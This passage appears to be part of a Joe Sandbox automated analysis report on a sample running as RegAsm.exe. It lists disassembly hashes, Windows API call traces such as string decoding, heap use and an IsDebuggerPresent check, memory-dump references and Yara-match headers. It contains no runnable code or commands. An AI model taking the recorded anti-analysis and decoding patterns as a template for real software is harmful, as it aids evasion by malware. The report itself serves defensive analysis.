                                              • Instruction ID: 557f19771c8756719dfb1868847c51112440e651a1578552e3745ce6793cf74c
                                              • Opcode Fuzzy Hash: b5a679f610ff1563acda1b074d3e322d6abe80ccc5cdba6b984f8d5881fc8b87
                                              • Instruction Fuzzy Hash: 6D210FB6900305AFDB10AF68DC81FEAB7E9EF15354F00441AF88497161DB72F860CBA5
                                              APIs
                                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,6d@,00000000,00000000), ref: 00406D9F
                                              • LocalAlloc.KERNEL32(00000040,6d@,?,?,00406436,00000000,?,?), ref: 00406DAD
                                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,6d@,00000000,00000000), ref: 00406DC3
                                              • LocalFree.KERNEL32(00000000,?,?,00406436,00000000,?,?), ref: 00406DD2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: BinaryCryptLocalString$AllocFree
                                              • String ID: 6d@
                                              • API String ID: 4291131564-2833952515
                                              • Opcode ID: 07297a27885fa965d9244d245d68dc03ea419e93441c2a657603b00e5f5aabee
                                              • Instruction ID: 21c8bbf66b44fac42f13d591f7c59cf5373e0e3b4a49451457007209dfea37cc
                                              • Opcode Fuzzy Hash: 07297a27885fa965d9244d245d68dc03ea419e93441c2a657603b00e5f5aabee
                                              • Instruction Fuzzy Hash: 8501E874201234BBCB215F56DD88ECB7FADEF4BBA1B104051FA0AAA250D2718950CAA0
                                              APIs
                                              • IsDebuggerPresent.KERNEL32 ref: 0041EBAA
                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041EBBF
                                              • UnhandledExceptionFilter.KERNEL32(00429FF8), ref: 0041EBCA
                                              • GetCurrentProcess.KERNEL32(C0000409), ref: 0041EBE6
                                              • TerminateProcess.KERNEL32(00000000), ref: 0041EBED
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                              • String ID:
                                              • API String ID: 2579439406-0
                                              • Opcode ID: 76df515215b4c90f54eac16ec56451da8a2b7c343eff6ec2bb25d7cede8acdc2
                                              • Instruction ID: 658e8adcc30e322284bda1868443fb43cff255b4b84b9b41d2f830270a927445
                                              • Opcode Fuzzy Hash: 76df515215b4c90f54eac16ec56451da8a2b7c343eff6ec2bb25d7cede8acdc2
                                              • Instruction Fuzzy Hash: 06212FBCA11300DFC710DF69F9466943BB2FB0B391F80202AE4088B660E7B45AC6CF19
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: RtreeMatchArg
                                              • API String ID: 0-1459067757
                                              • Opcode ID: 4b456da11811e32fa6b00bd492d59a2108c110acd52b8b20cf6e1d609a5dd434
                                              • Instruction ID: fd7191f840dcf162b4417234448c9d907307f064e0e2d4e680430dbd895276b2
                                              • Opcode Fuzzy Hash: 4b456da11811e32fa6b00bd492d59a2108c110acd52b8b20cf6e1d609a5dd434
                                              • Instruction Fuzzy Hash: 4302EEF4A047429FCB10CF25C980A9BBBF4BF69744F00461DF9899B211E734E995CBA2
                                              APIs
                                              • GetACP.KERNEL32 ref: 1B872A1F
                                              • IsValidCodePage.KERNEL32(00000000), ref: 1B872A56
                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,?,00000000,?), ref: 1B872C3A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID: CodeInfoLocalePageValid
                                              • String ID: utf8
                                              • API String ID: 790303815-905460609
                                              • Opcode ID: a0cd88d8b75b8d54c4b2ec5133385148cda290bab9a8f14bbbd7c69b966651a8
                                              • Instruction ID: 9bf4789f18ae5bba1616448babb8732f1d71de9f685981bba86769908b9a09c7
                                              • Opcode Fuzzy Hash: a0cd88d8b75b8d54c4b2ec5133385148cda290bab9a8f14bbbd7c69b966651a8
                                              • Instruction Fuzzy Hash: 277137B5A00306AADB15BF39CC86FEA73A8EF46F18F100029E955DB180FB70E544C7A5
                                              APIs
                                              • memset.MSVCRT ref: 00402481
                                              • CryptStringToBinaryA.CRYPT32(00000104,00000000,00000001,00000000,?,00000000,00000000), ref: 004024A7
                                              • CryptStringToBinaryA.CRYPT32(00000104,00000000,00000001,?,?,00000000,00000000), ref: 004024C1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: BinaryCryptString$memset
                                              • String ID: UNK
                                              • API String ID: 1505698593-448974810
                                              • Opcode ID: 915aa56b6389106d2bf27ea960dc53b772d9e7e11c29ce0488f590be3bba50fc
                                              • Instruction ID: 5b765708ded4d56476039759f4491a960e55f65d545ba668e33edd2c8b476d63
                                              • Opcode Fuzzy Hash: 915aa56b6389106d2bf27ea960dc53b772d9e7e11c29ce0488f590be3bba50fc
                                              • Instruction Fuzzy Hash: E8014FB260015CBEE711EB99DD81DFFB7ACEB44658F0000ABF704E2181D6B8AE454A79
                                              APIs
                                              • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 00411BB8
                                              • GetProcessHeap.KERNEL32(00000000,?,?,00404426,?,?,?,?,?,?,?,?,00000000), ref: 00411BC5
                                              • HeapAlloc.KERNEL32(00000000,?,00404426,?,?,?,?,?,?,?,?,00000000), ref: 00411BCC
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$AllocBinaryCryptProcessString
                                              • String ID:
                                              • API String ID: 1871034439-0
                                              • Opcode ID: 79c2337f4b38eefda7e9274680465812c3427f4f6a7efff84eead5125c2ca132
                                              • Instruction ID: 8208f6122bf114f306faf3b204c21700a5568cc7c8706a5a72bce6b0b3e9b5ab
                                              • Opcode Fuzzy Hash: 79c2337f4b38eefda7e9274680465812c3427f4f6a7efff84eead5125c2ca132
                                              • Instruction Fuzzy Hash: DB018C75500218BFDF118F61DC448EB7BBEFF8A355B204429FA0193220E7359D91EBA0
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f4ccdf9b743d75f8252b2851f4553c50142fb9d6052622b86404dbf4ff0d5e94
                                              • Instruction ID: 69ae3ed06c459cd4e8b80e4781908d35ccdba0647345bfe1e769a6f96519f59c
                                              • Opcode Fuzzy Hash: f4ccdf9b743d75f8252b2851f4553c50142fb9d6052622b86404dbf4ff0d5e94
                                              • Instruction Fuzzy Hash: 6AE0B6BA006700EBCE225F52DE47E9BBFB6BF58710F040C58F5C521670C772A860AB45
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 163b20eed04c21f543b465dbf508e26d1b36e382aec2e71a79acdea727c2a907
                                              • Instruction ID: 42323df1dd00b358854c3eaaba2381d969d7495569ee1063eb2db51f49abf9a0
                                              • Opcode Fuzzy Hash: 163b20eed04c21f543b465dbf508e26d1b36e382aec2e71a79acdea727c2a907
                                              • Instruction Fuzzy Hash: 57E0B6BA006780EBCF225F52DC46E9BBFB6AF58314F040C58F58561470C7B2A8A1AB45
                                              Strings
                                              • INSERT INTO '%q'.'%q_idx'(segid,term,pgno) VALUES(?,?,?), xrefs: 1B72597E
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: INSERT INTO '%q'.'%q_idx'(segid,term,pgno) VALUES(?,?,?)
                                              • API String ID: 0-143322027
                                              • Opcode ID: 2459a67ea006460db55a43a0d7751cea67073df04b217523b4d3e0ede8ac3c84
                                              • Instruction ID: 324632bdd935157cdadcf519e6928c09a85c00fec8c22f205fbda1b4a3bf1221
                                              • Opcode Fuzzy Hash: 2459a67ea006460db55a43a0d7751cea67073df04b217523b4d3e0ede8ac3c84
                                              • Instruction Fuzzy Hash: 6811ACB5500206BFDB109F59CC85FC6BBADFF05314F404145FA089B252C3B2B5A4CBA0
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 365e98d430c87eccbd46df5737cc328fa7e98f509f05211116eb17c27edf3de4
                                              • Instruction ID: ca103579c908b439459d460e17eea5f138bed562b05659c9ed1c056d37bb1694
                                              • Opcode Fuzzy Hash: 365e98d430c87eccbd46df5737cc328fa7e98f509f05211116eb17c27edf3de4
                                              • Instruction Fuzzy Hash: 264139B6604211AFCB019F18EC408EBB7B5EFA4620F044669F45487261D733DC52DB91
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7286b3828e7d72b752460e88ff9e47ba6d4473a46131ab91c3d1636473b80c0f
                                              • Instruction ID: 06eedc94c57180c244430b7315bbced1c9b26e107ecb9416ddb0b8175beab854
                                              • Opcode Fuzzy Hash: 7286b3828e7d72b752460e88ff9e47ba6d4473a46131ab91c3d1636473b80c0f
                                              • Instruction Fuzzy Hash: 293181B5600201AFEB44DF69EC85EAAB3E9FF58615F008529F949C3252E771F910CBA1
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 975c929e29e90f9755af7133ac2a266940bbe302df66bb0064f95d7808e488b7
                                              • Instruction ID: 2d7b8fe24c5454afe0e5fa49fabf0ee7e3c974913343dce88678d0bafd9485c0
                                              • Opcode Fuzzy Hash: 975c929e29e90f9755af7133ac2a266940bbe302df66bb0064f95d7808e488b7
                                              • Instruction Fuzzy Hash: 0431BEB5500301AFEF148F2ADC85BABB7E9EF84B54F504869F8478B291E771E850CB51
                                              APIs
                                              • _EH_prolog.MSVCRT ref: 0040EF86
                                                • Part of subcall function 0040EE86: _EH_prolog.MSVCRT ref: 0040EE8B
                                                • Part of subcall function 0040EE86: lstrlenA.KERNEL32(?,6CA87FA0,750A5460,00000000), ref: 0040EEAF
                                                • Part of subcall function 0040EE86: strchr.MSVCRT ref: 0040EEC1
                                              • GetProcessHeap.KERNEL32(00000008,?,?,6CA87FA0,00000000), ref: 0040EFD5
                                              • HeapAlloc.KERNEL32(00000000,?,6CA87FA0,00000000), ref: 0040EFDC
                                              • GetProcessHeap.KERNEL32(00000000,?,?,6CA87FA0,00000000), ref: 0040EFF1
                                              • HeapFree.KERNEL32(00000000,?,6CA87FA0,00000000), ref: 0040EFF8
                                              • strcpy_s.MSVCRT ref: 0040F031
                                              • GetProcessHeap.KERNEL32(00000000,?,?,?,750A5460,?,6CA87FA0,00000000), ref: 0040F048
                                              • HeapFree.KERNEL32(00000000,?,?,750A5460,?,6CA87FA0,00000000), ref: 0040F04F
                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,750A5460,?,6CA87FA0,00000000), ref: 0040F075
                                              • HeapFree.KERNEL32(00000000,?,?,?,?,?,750A5460,?,6CA87FA0,00000000), ref: 0040F07C
                                              • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,750A5460,?,6CA87FA0,00000000), ref: 0040F083
                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,750A5460,?,6CA87FA0,00000000), ref: 0040F08A
                                              • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,750A5460,?,6CA87FA0,00000000), ref: 0040F09F
                                              • HeapFree.KERNEL32(00000000,?,?,?,?,?,750A5460,?,6CA87FA0,00000000), ref: 0040F0A6
                                              • strcpy_s.MSVCRT ref: 0040F0B9
                                              • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,750A5460,?,6CA87FA0,00000000), ref: 0040F0CA
                                              • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,750A5460,?,6CA87FA0,00000000), ref: 0040F0D1
                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,750A5460,?,6CA87FA0), ref: 0040F0EC
                                              • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,750A5460,?,6CA87FA0,00000000), ref: 0040F0F3
                                              • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,750A5460,?,6CA87FA0), ref: 0040F0FA
                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,750A5460,?,6CA87FA0,00000000), ref: 0040F101
                                              • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,750A5460,?,6CA87FA0), ref: 0040F116
                                              • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,750A5460,?,6CA87FA0,00000000), ref: 0040F11D
                                              • strcpy_s.MSVCRT ref: 0040F130
                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 0040F141
                                              • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,750A5460), ref: 0040F148
                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,750A5460,?,6CA87FA0,00000000), ref: 0040F16A
                                              • HeapFree.KERNEL32(00000000,?,?,?,?,?,750A5460,?,6CA87FA0,00000000), ref: 0040F171
                                              • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,750A5460,?,6CA87FA0,00000000), ref: 0040F178
                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,750A5460,?,6CA87FA0,00000000), ref: 0040F17F
                                              • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,750A5460,?,6CA87FA0,00000000), ref: 0040F197
                                              • HeapFree.KERNEL32(00000000,?,?,?,?,?,750A5460,?,6CA87FA0,00000000), ref: 0040F19E
                                              • strcpy_s.MSVCRT ref: 0040F1B1
                                              • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,750A5460,?,6CA87FA0,00000000), ref: 0040F1C2
                                              • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,750A5460,?,6CA87FA0,00000000), ref: 0040F1C9
                                                • Part of subcall function 0040EDD8: strlen.MSVCRT ref: 0040EDEF
                                              • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,750A5460,?,6CA87FA0,00000000), ref: 0040F1D2
                                              • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,?,?,?,?,?,750A5460,?,6CA87FA0,00000000), ref: 0040F1E2
                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,750A5460,?,6CA87FA0,00000000), ref: 0040F1E9
